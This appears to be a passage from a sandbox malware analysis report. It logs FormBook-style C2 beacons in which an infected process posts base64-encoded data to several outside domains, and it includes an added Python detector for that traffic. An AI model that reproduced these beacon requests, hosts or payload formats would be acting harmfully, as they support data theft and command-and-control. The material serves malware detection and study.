                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 2b 52 66 4c 46 70 59 51 4e 4b 68 49 62 38 73 61 32 65 4a 66 42 61 77 32 41 2b 41 78 70 2f 76 4a 79 73 73 37 33 48 73 4c 46 48 72 6e 71 59 30 61 35 56 51 35 4f 61 73 33 48 72 58 64 6d 42 78 73 36 58 6b 48 79 2b 77 2f 78 73 59 4d 2b 34 37 2f 44 44 6a 51 33 75 69 78 4b 4b 43 6c 35 72 33 57 31 2f 63 35 42 66 6f 37 63 48 4f 71 51 58 4c 52 41 7a 52 71 57 32 72 50 73 48 61 44 4e 67 6d 38 6a 51 2b 2b 78 72 4d 6e 73 59 6c 33 57 2f 52 2f 76 6a 32 6d 4e 49 59 78 6e 44 31 6b 38 6d 71 [TRUNCATED]
Data Ascii: -NnllVvH=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267Pib+RfLFpYQNKhIb8sa2eJfBaw2A+Axp/vJyss73HsLFHrnqY0a5VQ5Oas3HrXdmBxs6XkHy+w/xsYM+47/DDjQ3uixKKCl5r3W1/c5Bfo7cHOqQXLRAzRqW2rPsHaDNgm8jQ++xrMnsYl3W/R/vj2mNIYxnD1k8mq [TRUNCATED]
Oct 8, 2024 16:35:26.921124935 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:26 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
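The sessions above show the same request shape against two different hosts. As an added illustration (this is not Joe Sandbox output and not a vendor signature), the following Python parses requests like the ones captured here and flags the traits that stand out: the fixed Windows NT 5.1 / MSIE 8.0 User-Agent, a short directory path, a Referer that is just Origin plus that path, and a single dash-prefixed form field (or two query parameters) carrying base64-looking data. The sample requests are reconstructed from sessions 15, 16 and 17 (the first POST body is cut to the prefix visible in that session's Data Raw column), the benign control request is made up, and the regex length ranges, the `shared_field_names` pivot and the final decision rule are this example's own assumptions.

```python
"""FormBook-style C2 beacon triage over raw HTTP requests (added example, not Joe Sandbox code)."""
import re

# Exact User-Agent sent in every captured request: a Windows XP / IE 8 string.
LEGACY_MSIE_UA = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; "
    ".NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
)
SHORT_DIR = re.compile(r"^/[a-z0-9]{3,6}/$")       # /nxfn/, /3bdq/ (length range assumed)
FIELD_NAME = re.compile(r"^-?[A-Za-z0-9]{4,16}$")  # -NnllVvH, e6mhx (length range assumed)
B64ISH = re.compile(r"^[A-Za-z0-9+/_=]{8,}$")      # base64 alphabet; '_' appears in the GET


def split_form(encoded: str) -> list[tuple[str, str]]:
    """Split k=v&k2=v2 without percent/plus decoding so base64 '+' survives."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_request(raw: str) -> dict:
    """Parse one raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.strip("\n").replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query,
            "headers": headers, "body": body.strip()}


def formbook_indicators(req: dict) -> list[str]:
    """Names of the FormBook-style traits this parsed request exhibits."""
    hits, h = [], req["headers"]
    if h.get("user-agent") == LEGACY_MSIE_UA:
        hits.append("legacy_msie_ua")
    if SHORT_DIR.match(req["path"]):
        hits.append("short_dir_path")
    if h.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if req["method"] == "POST":
        origin = h.get("origin", "")
        if origin and h.get("referer") == origin + req["path"]:
            hits.append("referer_is_origin_plus_path")
        fields = split_form(req["body"])
        if len(fields) == 1 and FIELD_NAME.match(fields[0][0]) and B64ISH.match(fields[0][1]):
            hits.append("single_b64_form_field")
    elif req["method"] == "GET":
        fields = split_form(req["query"])
        if len(fields) == 2 and all(FIELD_NAME.match(k) and B64ISH.match(v) for k, v in fields):
            hits.append("two_b64_query_params")
    return hits


def is_formbook_beacon(req: dict) -> bool:
    """Decision rule (assumed): legacy UA + short directory + an encoded payload shape."""
    hits = set(formbook_indicators(req))
    return {"legacy_msie_ua", "short_dir_path"} <= hits and bool(
        hits & {"single_b64_form_field", "two_b64_query_params"})


def shared_field_names(reqs: list[dict]) -> set[str]:
    """Field names seen against more than one Host (assumed pivot for linking sessions)."""
    hosts_by_field: dict[str, set[str]] = {}
    for req in reqs:
        source = req["body"] if req["method"] == "POST" else req["query"]
        for key, _ in split_form(source):
            hosts_by_field.setdefault(key, set()).add(req["headers"].get("host", ""))
    return {k for k, hosts in hosts_by_field.items() if len(hosts) > 1}


_UA = "User-Agent: " + LEGACY_MSIE_UA
# Reconstructed from sessions 15, 16 and 17 above; first body cut to the visible prefix.
SAMPLE_REQUESTS = [
    "POST /nxfn/ HTTP/1.1\nHost: www.languagemodel.pro\nOrigin: http://www.languagemodel.pro\n"
    "Content-Type: application/x-www-form-urlencoded\nConnection: close\n"
    "Referer: http://www.languagemodel.pro/nxfn/\n" + _UA + "\n\n"
    "-NnllVvH=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2K",
    "GET /nxfn/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r"
    "49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw= HTTP/1.1\n"
    "Host: www.languagemodel.pro\nConnection: close\n" + _UA + "\n",
    "POST /3bdq/ HTTP/1.1\nHost: www.kexweb.top\nOrigin: http://www.kexweb.top\n"
    "Content-Type: application/x-www-form-urlencoded\nConnection: close\n"
    "Referer: http://www.kexweb.top/3bdq/\n" + _UA + "\n\n"
    "-NnllVvH=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84no"
    "EngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2Nkxlqwt255+uoIme"
    "Yc9qMTkwn57UvvjOBvgrzA==",
]
# Constructed benign control: an ordinary form post that must not match.
BENIGN_REQUEST = ("POST /login HTTP/1.1\nHost: intranet.example\nUser-Agent: Mozilla/5.0\n"
                  "Content-Type: application/x-www-form-urlencoded\n\nuser=alice&password=hunter2")

if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS + [BENIGN_REQUEST]]
    for req in parsed:
        print(req["headers"].get("host"), req["method"], req["path"],
              is_formbook_beacon(req), formbook_indicators(req))
    print("field names shared across hosts:", shared_field_names(parsed))
```

Run as a script to see each request scored. The shared field name it reports, -NnllVvH, is the one value that ties the languagemodel.pro and kexweb.top sessions together. Note that the servers answered with a 502, a Gandi parking page and Apache 404s, so the response side of these sessions does not tell which host, if any, was the live C2; the request shape is the usable detection surface here.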


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.45002463.250.47.40802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:28.818638086 CEST | 553 | OUT | GET /3bdq/?-NnllVvH=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:29.400230885 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:29 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.4 | 50025 | 91.184.0.200 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:34.452384949 CEST | 833 | OUT | POST /ikh0/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Origin: http://www.jobworklanka.online
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBGncj4UxRDal7+cPRtXrvDEgcD6zp1qATA==
                                                                        Oct 8, 2024 16:35:35.132344961 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:34 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.2.4 | 50026 | 91.184.0.200 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:36.998725891 CEST | 853 | OUT | POST /ikh0/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Origin: http://www.jobworklanka.online
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DgTBEzHk2XJIJz1aWd7eIdXFafKSyA1QwQ=
                                                                        Oct 8, 2024 16:35:37.637835026 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:37 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        23 | 192.168.2.4 | 50027 | 91.184.0.200 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:39.753546953 CEST | 10935 | OUT | POST /ikh0/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Origin: http://www.jobworklanka.online
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH= [TRUNCATED]
                                                                        Oct 8, 2024 16:35:40.493004084 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:40 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        24 | 192.168.2.4 | 50028 | 91.184.0.200 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:42.287867069 CEST | 562 | OUT | GET /ikh0/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:42.902800083 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:42 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.2.4 | 50029 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:47.947877884 CEST | 803 | OUT | POST /h7lb/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Origin: http://www.dyme.tech
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.dyme.tech/h7lb/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Kt9lx7D6vGdEaPoewvcYv7ZsGxE9lzBUFxQ==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.2.4 | 50030 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:50.494606972 CEST | 823 | OUT | POST /h7lb/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Origin: http://www.dyme.tech
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.dyme.tech/h7lb/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZI1sD0R+CpMqRnLAOc5+OSr1AYXQhNhGLY=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.4 | 50031 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:53.247423887 CEST | 10905 | OUT | POST /h7lb/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Origin: http://www.dyme.tech
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.dyme.tech/h7lb/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.4 | 50032 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:55.789122105 CEST | 552 | OUT | GET /h7lb/?-NnllVvH=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Timestamp: Oct 8, 2024 16:35:56.288558960 CEST | Bytes transferred: 404 | Direction: IN
                                                                        HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Tue, 08 Oct 2024 14:35:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 264
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-NnllVvH=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&e6mhx=LZwxPLrhqt_8A"}</script></head></html>


                                                                        Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 50037 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 2844
                                                                        Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp: Oct 8, 2024 16:36:15.630598068 CEST | Bytes transferred: 812 | Direction: OUT
                                                                        POST /e0nr/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Origin: http://www.mizuquan.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.mizuquan.top/e0nr/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPNZMJIfNCE1Bk8SSgQUxYYwCYBBD+qUHdw==
                                                                        Timestamp: Oct 8, 2024 16:36:16.502734900 CEST | Bytes transferred: 691 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
